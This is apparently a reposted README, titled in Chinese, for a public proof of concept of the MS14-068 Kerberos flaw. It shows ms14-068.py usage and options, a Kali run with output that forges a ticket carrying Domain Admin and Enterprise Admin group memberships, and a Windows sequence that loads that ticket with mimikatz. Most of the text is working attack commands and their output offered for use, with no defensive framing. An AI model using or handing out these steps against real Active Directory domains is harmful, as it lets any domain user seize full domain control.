MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

admin

https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

usage:

1. ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
   
2. 
   
3. OPTIONS:
   
4.     -p <clearPassword>
   
5. --rc4 <ntlmHash>
   
6. Example usage :
   
7. 
   
8. Linux (tested with samba and MIT Kerberos)
   
9. 
   
10. root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
    
11. Password:
    
12.   [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
    
13.   [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
    
14.   [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
    
15.   [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
    
16.   [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
    
17.   [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
    
18.   [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
    
19.   [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
    
20.   [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
    
21. root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

复制代码

on windows:

1. python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
   
2. mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

复制代码